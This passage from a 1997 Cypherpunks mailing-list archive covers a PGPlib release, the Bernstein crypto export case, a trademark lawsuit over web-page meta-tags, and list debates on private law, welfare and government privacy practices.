"Tage Stabell-Kulo ". When you unpack PGPlib-0.3.tar, tar will create the directory PGPlib-0.3 and place all the files within it. Unless you run SunOS, running the script configure should produce Makefiles that you can use to compile everything. To verify that everything compiled correctly, you should run the script applications/test.sh. Before you do so, you must edit away the code that asks you to read this file. COPYRIGHT (yum, yum) ========= The library and included applications are all available under "Berkeley style" copyright terms. Basically, this means that PGPlib is FREE for commercial and non-comercial use, and that you can do almost anything with the code. The only thing you can not do is to say that you wrote it. See the file COPYING for details. //// Tage Stabell-Kuloe | e-mail: tage at ACM.org //// /// Department of Computer Science/IMR | Phone : +47-776-44032 /// // 9037 University of Tromsoe, Norway | Fax : +47-776-44580 // / "'oe' is '\o' in TeX" | URL:http://www.cs.uit.no/~tage/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: latin1 Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface iQCVAwUBNAPu4wMzZ6tx+9RpAQEM2AP/Sp7REQHWSRGhscblUpX7CPoin6h9Lo5Y D0CzO/7cm9kqXqB3oQ3xPhchEcXzJEyABz8mehoAm6+D3Bqus1aI1JkcD6mVmoUE yQ3QU0X0jXdN84xcjTn6cyQx3iuu17MQ5/WKoLh2Ftq5DzBGATGlmGN6O6TRUbAW SZrCOQDN54M= =XjX4 -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ PGP Library Announcements --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From anon at anon.efga.org Wed Aug 27 07:30:46 1997 From: anon at anon.efga.org (Anonymous) Date: Wed, 27 Aug 1997 22:30:46 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <5d899dc016989b104a08057a85bc9e88@anon.efga.org> -----BEGIN PGP SIGNED MESSAGE----- "John Smith" wrote: >You know, there's a reason people started using judges to help settle >disputes. There's a reason the common law evolved with the idea of >proportionate response and restitution. This kind of >shoot-everybody-I-think-harmed-me approach just doesn't work. Nobody >knows what someone else will consider harm worth shooting over. If >somebody disagrees that a shooting was justified, they'll shoot back, >and feuds begin. See "The Machinery of Freedom" by David Friedman. (Sorry if this is old hat to you or other members of this list.) Friedman's legal arrangement works something like this: Say you kill somebody. If you want to protect your life from revenge, you immediately report what you did to three people nearby who were uninvolved. This keeps you inside the legal system. Afterwards, a compensation arrangement is made between your protection company and the protection company of your victim. This occurs within the legal framework. If you do not comply with the compensation agreement, you are outlawed. Outlaws receive no legal protection. You can change protection companies anytime you like. Improbable? This is very similar to the Icelandic legal system of circa 1000 C.E. Friedman claims that this worked quite well for many years. Icelanders at that time were murderous pirates, yet in Iceland they murdered each other much less frequently than Americans do now in the United States. The compensation payments were typically nontrivial - on the order of twenty years of income. Some interesting aspects of medieval Icelandic politics: no prisons, no standing army, no single political leader, and no taxes. Just Another Cypherpunk - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzQDR/QAAAEH/16yrVPsexy8QB9PVBBWYEYwdurA9pNjqPc+zSnxtt51d74Z nLsjzHUdGReLFjRM6RjG95STr6Wn0fhOPGMujNyxkV3fbgGxdupQ+9S/3eET0sNO 0NMn4YbOrHec9+3sq3J/Lb1Ds+Me4ioeWWMkgQ2MfpDbhajih0ZL6A6w6s3hkars qPxZy5/Wf3ahQ7M2M5IoujVj6G1PczaU/cUoGNg9HkB+PVZNEyVOkZfVoS3lTywx 6GfpLOEssQI8sprYr4qEOVP7TaevuGPGW5r1uTvqnbKGPxbqCrpVTEG620JwupLA OEAda0052TdZqJXm8T84aUrICloG/7WvDgiTIEUABRG0Jkp1c3QgQW5vdGhlciBD eXBoZXJwdW5rIDxmb29AZGV2Lm51bGw+ =as72 - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBNAOj5v+1rw4IkyBFAQGszQf9EOsOO6rZkboCTGes5IcM/co7Os5Gb7Ri YhQQTVAsMD7zQ30rrEmx9pMCPtgkaF9zesG0/EUVOogbPiv1LagFJOLOiKjiqHrI sA48lGAYB5YBBBNtGMP7kMIJDc5M7QY7RoyHzsCGKaymsFFQNzpOCmKmTIKC3LD5 jQ6a9hBe9xwzzXkS0j+sdI62zjv/2Fco2DK8PkHFOINi3+GsKLZrVSelC6htEi7W amBdi2clNYcawoc9yGXOiL6233e5/A+Usrh9fQ74EPAErSkz8EjI13Yd8+HOes8U 6CMm+SWdCGKpp6Z9DN7B6i5ybLoNek3pl5mHWGfbZOtJ8nIblrMPRA== =DiLK -----END PGP SIGNATURE----- From gnu at toad.com Wed Aug 27 23:31:07 1997 From: gnu at toad.com (John Gilmore) Date: Wed, 27 Aug 1997 23:31:07 -0700 (PDT) Subject: Govt seeking emergency stay in Bernstein case Message-ID: <199708280624.XAA17195@toad.com> Date: Wed, 27 Aug 1997 13:43:36 -0700 From: Cindy Cohn Hi all, Just talked to Mr. Coppolino at the Justice Department. They are filing ex parte emergency stay papers tonight or tomorrow morning to try to stay the impact of Judge Patel's ruling pending appeal. He'll be faxing me the documents when they are ready. He said yesterday that they would seek to stay the "export" of crypto source code, although not the teaching or discussion (whatever that means). Cindy A. Cohn [Update: We received the faxed papers about 8PM; images of them will be in a sub-directory of http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/ on Thursday morning. The Bernstein team is opposing their motion; our filing will also be on the Web site. It was reported by C|Net that the government is "appealing"; this is not true. They are asking that Judge Patel to "stay" her own ruling -- hold it in abeyance -- to prevent Prof. Bernstein from exercising his First Amendment rights before they can appeal. But they have not filed an appeal, or formally indicated their intent to do so. --gnu] From alan at ctrl-alt-del.com Wed Aug 27 08:35:55 1997 From: alan at ctrl-alt-del.com (Alan) Date: Wed, 27 Aug 1997 23:35:55 +0800 Subject: How tO MutAte anD TaKE OVer tHe WOrld In-Reply-To: <19970827043758.22153.qmail@hotmail.com> Message-ID: On Tue, 26 Aug 1997, luciana luciana wrote: > I'm very interested on that. > could u let me know anything else? I picked up a copy of the book a while back. Some of the sidenotes and off-storyline events are interesting and mildly humorous. The ending was incredibly unbelievable and anti-climatic. (The tacked on end-of-the-end was just plain stupid.) The main characters spend little time involved with the revolution they claim to be bringing about. It does make mention of the Cypherpunks. (One of the authors was involved in the very beginning, but I have not seen her post here any time in my memory. (She claims to have coined the term "Cypherpunk".)) If you want Cyberpunk/Cypherpunk fiction, there are much better choices. Neal Stephenson (sp?) is a good choice. ("Snow Crash" and the short story "Hacking the Spew" are two of my favorites from him.) If you do get "How to mutate...", wait until it comes out in paperback. Then you won't feel as cheated as I did when i finished the book. alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From roach_s at alph.swosu.edu Wed Aug 27 09:38:49 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 00:38:49 +0800 Subject: How tO MutAte anD TaKE OVer tHe WOrld Message-ID: <199708271632.MAA08060@www.video-collage.com> At 08:28 AM 8/27/97 -0700, Alan wrote: > >On Tue, 26 Aug 1997, luciana luciana wrote: > >> I'm very interested on that. >> could u let me know anything else? > >I picked up a copy of the book a while back. > >Some of the sidenotes and off-storyline events are interesting and mildly >humorous. The ending was incredibly unbelievable and anti-climatic. (The >tacked on end-of-the-end was just plain stupid.) The main characters >spend little time involved with the revolution they claim to be bringing >about. > >It does make mention of the Cypherpunks. (One of the authors was involved >in the very beginning, but I have not seen her post here any time in my >memory. (She claims to have coined the term "Cypherpunk".)) > >If you want Cyberpunk/Cypherpunk fiction, there are much better choices. >Neal Stephenson (sp?) is a good choice. ("Snow Crash" and the short story >"Hacking the Spew" are two of my favorites from him.) > >If you do get "How to mutate...", wait until it comes out in paperback. >Then you won't feel as cheated as I did when i finished the book. > >alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply >Alan Olsen | to my mail, just hit the ctrl, alt and del keys. > The author who claims that is St. Jude, AKA Judith Milton, she is a former UNIX programmer who is also absent from the MUT home page. The book itself is a little large for a paperback version, you have to read the warning about the broken "scrapbook" method and remember that these people are humor writers. I grabbed a copy probably 3 months after it was released. The dust cover is very flimsy, has it improved? There is a web site dedicated to the book, HTTP://www.onworld.com:80/MUT The site is a shambles right now but I was told that they were going to try to salvage it after the holiday weekend. When it is working it has a nice web-based bulliten board, with some threading, and way too many "how do I hack" questions. There are a few good gems and some people very much in line with those here, however. It's worth a visit, but give it a little while and see if they get the bulliten boards back on line. It is over 18 months old, I have been visiting it off and on for about a year. From roach_s at alph.swosu.edu Wed Aug 27 09:41:46 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 00:41:46 +0800 Subject: Bell Message-ID: <199708271632.MAA08062@www.video-collage.com> I read that Jim Bell is now in jail, in part over his A.P scheme. Reading it reminded me that I had vowed to return at the end of the summer. Could someone fill me in on any details that the article might have missed or ommitted? From roach_s at alph.swosu.edu Wed Aug 27 09:55:30 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 00:55:30 +0800 Subject: heart Message-ID: <199708271649.MAA09156@www.video-collage.com> At 11:55 PM 8/26/97 -0700, Kent Crispin wrote: > >On Mon, Aug 25, 1997 at 02:20:33PM -0700, Tim May wrote: >> And I think that most of what passes for "help" actually does more harm >> than good, at least in the longterm. > >There is no doubt that sometimes "help" does more harm than good. >There is also no doubt that sometimes help does more good than harm. >Platitudes like these don't really give one much real guidance. > >> For example, sending food aid to Third World countries sounds noble and >> good. But most studies show the real effect of such aid: it destroys the >> local infrastructure of food production and distribution. (Imagine being a >> poor Somali farmer bringing your grain to market, and seeing tons of U.S. >> grain being distributed freely...it wipes that farmer out, and his future >> years of production are gone, even after the U.S. food aid is also gone.) > >So the farmer can die of starvation later rather than earlier. The >problem is not with help, per se -- it's with the specifics of how the >help is implemented. What do you think the farmer would chose -- get >some food now, and take his chances with his food production at a >later time, or die of starvation immediately? > >A current case is North Korea. Of course if you give them food it >will help perpetuate an evil government. On the other hand, if you >don't give them food, lot's and lot's of people would die. Tim's >answer is that you might as well let them die, rather than perpetuate >the government that enslaves them. Others aren't quite as >cold-blooded as Tim. > I would venture to guess that very limited sustanence and more active aid to the faltering industry would be more effective. Then again I have heard of brand new tractors rusting in the field because the local farmer couldn't or wouldn't adapt to it, so even aid to the industry can be ineffective. >> For example, the welfare system. Who can argue that it produces persons >> unable or unwilling to take the available jobs, mostly at or near minimum >> wage? When a welfare mother of two or more children can collect the total >> equivalent (direct payments, food coupons, tax exemptions, day care) of $15 >> an hour, it would be foolish for her to apply for a job at Burger King for >> $6.35 an hour, and then have to pay almost that amount to put her kids in >> some day care center. The longer she is out of the job market, the worse it >> gets. > >The welfare system obviously has all kinds of problems. It's not >easy giving help without creating dependency. That doesn't mean it >can't be done. > I like the idea of reviving the WPA. We have enough county and state jobs that need to get done, and do not require any formal training. Some can even be done by the blind, deaf, mentally handicapped, and wheelchair bound individuals who might actually jump at the chance to pull thier own weight. I believe the idea is called "right to work", but I could be misinformed. >> For example, saving people from their bad choices in life. When we force >> insurers to cover those who do stupid, formerly uninsurable things, or when >> we force the providers of legally and freely-chose substances (tobacco, >> hamburger, guns, breast implants, rock climbing equipment, etc.) to pay for >> the stupid actions of others, even if only imagined, costs rise and choices >> narrow. > >Yep. I don't see this as the same category of trying to help people, >though. Rather, I think this example points out the end result of >our adversarial legal system. Pretty soon every revolver will have a warning label. "Warning, misuse of this tool can result in injury and death. By handling this item you consent to bear all legal responsibility reguarding its use." Never mind that such should be implied. From aba at dcs.ex.ac.uk Wed Aug 27 10:22:54 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Thu, 28 Aug 1997 01:22:54 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: <199708270818.JAA01014@server.test.net> David Formosa writes: > On Tue, 26 Aug 1997, William H. Geiger III wrote: > > [...] > > > "You fuck with me, my family, or my property you die. You leave me alone > > and I leave you alone." > > Thats fine and good. But if I can't trust the goverment to folow its own > rules and uphold liberty how can I trust you? And how can I trust the > next person? and the next? ... It's a distributed system, it's more resilient to abuse than governments. If one person becomes too much of a nuisance (real trigger happy for ultra minor infractions -- swearing at them, daring to look at them when they're in a bad bood) relatives, friends, or concerned citizens will correct (fill trigger happy person with lead). That's how the wild west worked anyway... outlaws didn't last that long. So you're relying on other peoples sense of fairness ... should easily work out better than governments. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 "Myron Lewis" > We invite you and everyone on the list (Please send this invitation out to > them as the info on how to do that didn't come through.) to visit the KeyGen > webpage, www.KeyGen.com and learn about Automatic Synchronized > KeyGeneration(TM). If you think you recognize it as something you have seen > before, you're close but wrong. What one man knows, nobody knows. What two men know, everyone knows. Shared secrets just don't work. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From roach_s at alph.swosu.edu Wed Aug 27 12:20:28 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 03:20:28 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <199708271913.PAA20356@www.video-collage.com> At 10:23 AM 8/27/97 -0400, Anonymous wrote: > >-----BEGIN PGP SIGNED MESSAGE----- > >"John Smith" wrote: >>You know, there's a reason people started using judges to help settle >>disputes. There's a reason the common law evolved with the idea of >>proportionate response and restitution. This kind of >>shoot-everybody-I-think-harmed-me approach just doesn't work. Nobody >>knows what someone else will consider harm worth shooting over. If >>somebody disagrees that a shooting was justified, they'll shoot back, >>and feuds begin. > >See "The Machinery of Freedom" by David Friedman. (Sorry if this is >old hat to you or other members of this list.) > >Friedman's legal arrangement works something like this: Say you kill >somebody. If you want to protect your life from revenge, you >immediately report what you did to three people nearby who were >uninvolved. > >This keeps you inside the legal system. Afterwards, a compensation >arrangement is made between your protection company and the protection >company of your victim. This occurs within the legal framework. If >you do not comply with the compensation agreement, you are outlawed. >Outlaws receive no legal protection. > >You can change protection companies anytime you like. > >Improbable? This is very similar to the Icelandic legal system of >circa 1000 C.E. Friedman claims that this worked quite well for many >years. Icelanders at that time were murderous pirates, yet in Iceland >they murdered each other much less frequently than Americans do now in >the United States. > >The compensation payments were typically nontrivial - on the order of >twenty years of income. > >Some interesting aspects of medieval Icelandic politics: no prisons, >no standing army, no single political leader, and no taxes. > >Just Another Cypherpunk I got something very similar from a friend who is much higher on the technological food chain than myself. He also told me that there was this big fair/trade-show/political rally that everyone attended. Once a year I think. That in addition to stopping by three houses to report the killing the killer had to report it at the next of these events to occur. It was also suggested that the compensation was a fairly fixed amount but that a person who could afford it and really didn't want trouble from the heirs of the deceased could pay more, thus suggesting that he considered the deceased to be more valuable than the average man. Sort of a post-mortem complement by the killer. Also, according to what I remember, the "protection company" was your extended family. Pay up or face the wraith of all the deceased's cousins, nephews, uncles, neices, aunts, maybe his kids. I would love to get more information on this, however, the friend who told me this much has left this little school for the larger waters of Oklahoma State University where he is in the engineering pod. From vipul at pobox.com Wed Aug 27 12:22:59 1997 From: vipul at pobox.com (Vipul Ved Prakash) Date: Thu, 28 Aug 1997 03:22:59 +0800 Subject: Study sees privacy lacking on government Web sites (fwd) Message-ID: <199708280028.AAA00649@fountainhead.net> >From Infobeat : *** Study sees privacy lacking on government Web sites While the Clinton administration is pressuring companies with Internet sites to respect the privacy of Web surfers, a new survey finds the government itself is far from perfect regarding this issue. Almost half the 70 Internet sites run by federal agencies collect data about visitors, but most disclose nothing about how the information will be used, according to OMB Watch. Privacy concerns arise on the Internet because whenever a person using Web browsing software visits a site, the site can collect information about the person, sometimes without their knowledge. For the full text story, see http://www.infobeat.com/stories/cgi/story.cgi?id=4638339-daf -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Web Objects 91 11 2233328 | - PERL Development 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - Networked Virtual Spaces From enoch at zipcon.net Wed Aug 27 12:42:28 1997 From: enoch at zipcon.net (Mike Duvos) Date: Thu, 28 Aug 1997 03:42:28 +0800 Subject: Cypherpunks in "The Guide" Message-ID: <19970827193235.27133.qmail@zipcon.net> The Cypherpunks have gotten honorable mention as the only intellectually honest defenders of Free Speech left on the Net in a "Guide Magazine" article. http://www.guidemag.com/newsslant/vigilante-censors.html Apparently the author reads the list. I seem to have been quoted. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From roach_s at alph.swosu.edu Wed Aug 27 12:55:11 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 03:55:11 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <199708271949.PAA23255@www.video-collage.com> At 09:18 AM 8/27/97 +0100, Adam Back wrote: >It's a distributed system, it's more resilient to abuse than >governments. > >If one person becomes too much of a nuisance (real trigger happy for >ultra minor infractions -- swearing at them, daring to look at them >when they're in a bad bood) relatives, friends, or concerned citizens >will correct (fill trigger happy person with lead). > >That's how the wild west worked anyway... outlaws didn't last that >long. > >So you're relying on other peoples sense of fairness ... should easily >work out better than governments. > Ever heard of mob violence? Read up on the Salem witch trials when a bunch of people got together and murdered a bunch of thier own on the evidence of the rantings of a few girls. Don't forget hitler, who managed to swing an entire country against a ever growing list of minorities. Granted, this was from within government, but the principle is the same. Anarchy is good, as long as an us versus them mentality doesn't occur. That would require a far more homogenious population than we have now. If everyone had the same skin color, hair color, eye color, bone structure, and color of socks, war would eventually break out over who lived on which side of the river. From rah at shipwright.com Wed Aug 27 13:22:54 1997 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 28 Aug 1997 04:22:54 +0800 Subject: <>(August 27, 1997) Back to the Future Message-ID: --- begin forwarded text X-Lotus-FromDomain: BIONOMICS at INTERLIANT @ OUTBOUND From: "VitaminB" To: "DAILY DOSE" Date: Wed, 27 Aug 1997 11:04:00 -0700 Subject: <>(August 27, 1997) Back to the Future Mime-Version: 1.0 Vitamin B: Your Daily Dose of Bionomics August 27, 1997 Back to the Future "In the pre-Civil War period, when the general ethos of laissez faire severely discouraged government intervention in the market economy, private regulations arose in the form of a variety of institutions, which accomplished much of what we endeavor to do today with our elaborate system of government rule making and supervision. In particular, scholars have noted that the period saw the development of private measures to help holders of bank notes protect themselves from risk. As the notes were not legal tender, there was no obligation to accept the currency of a suspect bank, or to accept it at par value; accordingly, notes often were accepted and cleared at less than par. As a result, publications--bank note reporters--were established to provide current information on market rates for notes of different banks based on their creditworthiness, reputation, and location, as well as to identify counterfeit notes. Bank note brokers created a ready market for notes of different credit quality. In some areas, private clearinghouses were established, which provided incentives for self-regulation. " "Banks competed for reputation, and advertised high capital ratios to attract depositors. Capital to asset ratios in those days often exceeded one-third. One must keep in mind that then, as now, a significant part of safety and soundness regulations came from market forces and institutions. Government regulation is an add-on that tries to identify presumed market failures and, accordingly, substitute official rules to fill in the gaps. " "To be sure, much of what developed in that earlier period was primitive and often ineffectual. But the financial system itself was just beginning to evolve. " "From today's presumably far more sophisticated view of such matters, we may look askance at what we have often dismissed as 'wildcat banking.' But it should not escape our notice that, as the international financial system becomes ever more complex, we, in our regulatory roles, are being driven increasingly toward reliance on private market self-regulation similar to what emerged in more primitive forms in the 1850s in the United States." --Alan Greenspan Toward Electronic Money & Banking: The Role of Government A Conference Sponsored by the United States Department of the Treasury September 19-20, 1996 --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From sandro at pop.hsbcbamerindus.com.br Wed Aug 27 13:25:50 1997 From: sandro at pop.hsbcbamerindus.com.br (Sandromar Ferreira) Date: Thu, 28 Aug 1997 04:25:50 +0800 Subject: Crypto best book Message-ID: <34048792.F8463AF3@bbamerindus.com.br> What is the best book about cryptography ? Sandro. From whgiii at amaranth.com Wed Aug 27 15:38:32 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 28 Aug 1997 06:38:32 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708271949.PAA23255@www.video-collage.com> Message-ID: <199708272237.RAA03869@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <199708271949.PAA23255 at www.video-collage.com>, on 08/27/97 at 03:49 PM, Sean Roach said: >At 09:18 AM 8/27/97 +0100, Adam Back wrote: >>It's a distributed system, it's more resilient to abuse than >>governments. >> >>If one person becomes too much of a nuisance (real trigger happy for >>ultra minor infractions -- swearing at them, daring to look at them >>when they're in a bad bood) relatives, friends, or concerned citizens >>will correct (fill trigger happy person with lead). >> >>That's how the wild west worked anyway... outlaws didn't last that >>long. >> >>So you're relying on other peoples sense of fairness ... should easily >>work out better than governments. >> >Ever heard of mob violence? Read up on the Salem witch trials when a >bunch of people got together and murdered a bunch of thier own on the >evidence of the rantings of a few girls. >Don't forget hitler, who managed to swing an entire country against a >ever growing list of minorities. Granted, this was from within >government, but the principle is the same. >Anarchy is good, as long as an us versus them mentality doesn't occur. >That would require a far more homogenious population than we have now. >If everyone had the same skin color, hair color, eye color, bone >structure, and color of socks, war would eventually break out over who >lived on which side of the river. Both of your examples only go to prove the point of anarchy is better then governments. In the Salem witch trial they were government trials (which were based on a political power struggle in Salem at the time) not lynch mobs. In Germany, as in all mass murders, was the act of the *Governemnt*. No matter how you add the numbers up there has been many many more deaths caused by governments than there ever has or will be by criminal. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNASd2Y9Co1n+aLhhAQFw5gQAo8N9bEITAmgMjff7cbr1eIvl3BQZXq2K lVxEroZVJvpmPGF79LdmVGTHGoDwOvRaVC8SGVpGQuK5uDr1ZzcgbaUB0cq6SJ4H 4bb243CeZ+onxHSkMGK/DMflMoJ4z/gBL2+mcR/LmP04Vkf/D+CuMMyDnNUk60vl tNLUnVhEPd8= =m58o -----END PGP SIGNATURE----- From declan at well.com Wed Aug 27 15:56:29 1997 From: declan at well.com (Declan McCullagh) Date: Thu, 28 Aug 1997 06:56:29 +0800 Subject: Government to seek stay in Bernstein case Message-ID: ---------- Forwarded message ---------- Date: Wed, 27 Aug 1997 13:43:46 -0700 From: Cindy Cohn Subject: Government to seek stay in Bernstein case Hi all, Just talked to Mr. Coppolino at the Justice Department. They are filing ex parte emergency stay papers tonight or tomorrow morning to try to stay the impact of Judge Patel's ruling pending appeal. He'll be faxing me the documents when they are ready. Cindy ************************ Cindy A. Cohn McGlashan & Sarrail, P. C. 177 Bovet Road, 6th Floor San Mateo, CA 94402 (415) 341-2585 (tel) (415)341-1395 (fax) Cindy at McGlashan.com http://www.McGlashan.com From roach_s at alph.swosu.edu Wed Aug 27 15:58:13 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 06:58:13 +0800 Subject: <>(August 27, 1997) Back to the Future Message-ID: <199708272251.SAA08820@www.video-collage.com> At 04:05 PM 8/27/97 -0400, Robert Hettinga wrote: > > <> > > > > >Vitamin B: >Your Daily Dose of Bionomics > >August 27, 1997 > >Back to the Future > >"In the pre-Civil War period, when the general >ethos of laissez faire severely discouraged >government intervention in the market economy, >private regulations arose in the form of a variety >of institutions, which accomplished much of >what we endeavor to do today with our elaborate >system of government rule making and >supervision. In particular, scholars have noted >that the period saw the development of private >measures to help holders of bank notes protect >themselves from risk. As the notes were not >legal tender, there was no obligation to accept >the currency of a suspect bank, or to accept it >at par value; accordingly, notes often were >accepted and cleared at less than par. As a >result, publications--bank note reporters--were >established to provide current information on >market rates for notes of different banks based >on their creditworthiness, reputation, and location, >as well as to identify counterfeit notes. Bank note >brokers created a ready market for notes of >different credit quality. In some areas, private >clearinghouses were established, which >provided incentives for self-regulation. " > >"Banks competed for reputation, and advertised >high capital ratios to attract depositors. Capital to >asset ratios in those days often exceeded one-third. >One must keep in mind that then, as now, a significant >part of safety and soundness regulations came from >market forces and institutions. Government regulation >is an add-on that tries to identify presumed market >failures and, accordingly, substitute official rules to >fill in the gaps. " > >"To be sure, much of what developed in that earlier >period was primitive and often ineffectual. But the >financial system itself was just beginning to evolve. " >... Your description reminds me of some descriptions of how UNIX has been evolving. I guess with time and the appropiate types of hackers, any system can become secure after a few cycles. It may not be elegant but it gets the job done. From declan at well.com Wed Aug 27 15:58:18 1997 From: declan at well.com (Declan McCullagh) Date: Thu, 28 Aug 1997 06:58:18 +0800 Subject: Trademark lawsuit over key words in web pages Message-ID: ---------- Forwarded message ---------- Date: Wed, 27 Aug 1997 15:32:36 -0700 (PDT) From: Declan McCullagh To: fight-censorship-announce at vorlon.mit.edu Subject: Trademark lawsuit over key words in web pages This is a fascinating lawsuit. Might keywords in web pages -- inserted like tasty morsels to attract hungry scavenger robots -- violate the law? Has trademark law become so broad that it violates long-held principles of free expression? What if my web page criticizes, say, Microsoft's alliance with Apple -- am I allowed to include "Microsoft sucks" as keywords? Certainly in this case no person would confuse my web site with microsoft.com -- but might a robot webcrawler? -Declan ------------------ http://www.ljx.com/internet/ Patents.com Sues for Trademark Infringement: Can a publisher infringe a law firm's trademark by including its name in computer code? A patent law firm is taking the question to federal court. New York based Oppedahl & Larson, which operates the Internet site www.patents.com, is suing five companies it claims improperly used the firm's name to draw business to their web sites. The firm is charging the companies and three individual defendants with unfair competition and trademark infringement for including the firm's name without permission in program coding for their web sites. Attorneys say some of the coding -- called a meta-tag -- caused Internet users looking for Oppedahl & Larson to be directed by a search engine to another company. [...] ------------------ From: Sandi >Subject: Re: Competitor Name in Meta-tags Is a No-No >Date: Wed, 27 Aug 1997 15:31:45 -0600 > >Dr. Welch of Advanced Concepts (who is being sued) has been >a online friend of mine for over a year now. In fact, I bought my first >virtual domain from him and ProWebSite. He is just the nicest >guy - a dentist in Texas. This whole thing has him quite uptight >though. I guess you just can't be toooooo careful with those >pesky Meta Tags... > >~Sandi ------------------ IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF COLORADO Civil Action No. 97-Z-1592 OPPEDAHL & LARSON, Plaintiff, v. ADVANCED CONCEPTS, ROBERT A. WELCH, CODE TEAM - LBK, INC., GEORGE WILLIAMS, PROFESSIONAL WEBSITE DEVELOPMENT, DAVE DEAN, MSI MARKETING, INC., and INTERNET BUSINESS SERVICES, Defendants. [...] 36. Based on an evaluation of the underlying source documents, Plaintiff has determined that the URLs on defendants' web sites are using Plaintiff's "OPPEDAHL" and "LARSON" marks to erroneously identify to search services that these URLs are identifying services provided by Plaintiff. 37. Notwithstanding plaintiff's well-known and prior use of, and prior statutory and common-law rights in, the marks "OPPEDAHL & LARSON," defendants, without the consent of plaintiff, have adopted, used and caused to be used in interstate commerce, and continues to use and cause to be used, the substantially identical mark in connection with identifying the source of the content of its web pages. 38. Such use by defendants of web pages bearing a substantially identical mark to plaintiff's mark "OPPEDAHL & LARSON" is misleading and is likely to cause confusion and mistake, and to deceive the public into believing falsely that defendants' web pages are connected with and/or sponsored or authorized by Plaintiff, when in fact defendants have no connection whatsoever with Plaintiff in regard to such web pages. 39. Defendants' misleading use of a mark substantially identical to the mark "OPPEDAHL & LARSON" constitutes false advertising, false designation of origin, and false representation in and affecting interstate commerce in violation of Section 43(a) of the Lanham Act, 15 U.S.C. � 1125(a). 40. As a proximate result of the acts of defendants as alleged herein, Plaintiff has suffered and will continue to suffer great damage to its business, goodwill, reputation, and profits. 41. Plaintiff has no adequate remedy at law against this unfair competition. Unless defendants are preliminarily and permanently enjoined by this Court, plaintiff will continue to suffer irreparable harm. Second Cause of Action (Federal Dilution) 42. Plaintiff realleges and incorporate herein by reference the allegations of paragraphs 1-37 and 40-41 of the Complaint as set forth above. 43. As a direct result of plaintiff's long and extensive experience, care, and skill in producing and marketing legal services and providing information on intellectual property law under the mark "OPPEDAHL & LARSON," plaintiff's mark has become famous. 44. Defendants, by using a confusingly similar trademark, are misleading the public into believing that their services are connected with Plaintiff's business. On information and belief, the defendants willfully intended to trade on the reputation of Oppedahl & Larson or to cause dilution of the "OPPEDAHL & LARSON" mark. 45. Such acts by defendants are likely to deprive plaintiff of the benefit of the goodwill attached to the mark "OPPEDAHL & LARSON," injure plaintiff's business reputation, and dilute the distinctive quality of plaintiff's trademark in violation of 15 U.S.C. � 1125(c). 46. As a proximate result of the acts of defendants as alleged herein, plaintiff has suffered and will continue to suffer damage to its business, goodwill, and reputation. 47. Plaintiff has no adequate remedy at law against this dilution of and injury to business reputation. Unless defendants are enjoined by this Court, plaintiff will continue to suffer irreparable harm. Third Cause of Action (Unfair Competition - Colorado Common Law) 48. Plaintiff realleges and incorporates herein by reference the allegations of paragraphs 1-38 the Complaint as set forth above. 49. Plaintiff's mark "OPPEDAHL & LARSON" is inherently distinctive and has acquired a strong secondary meaning. 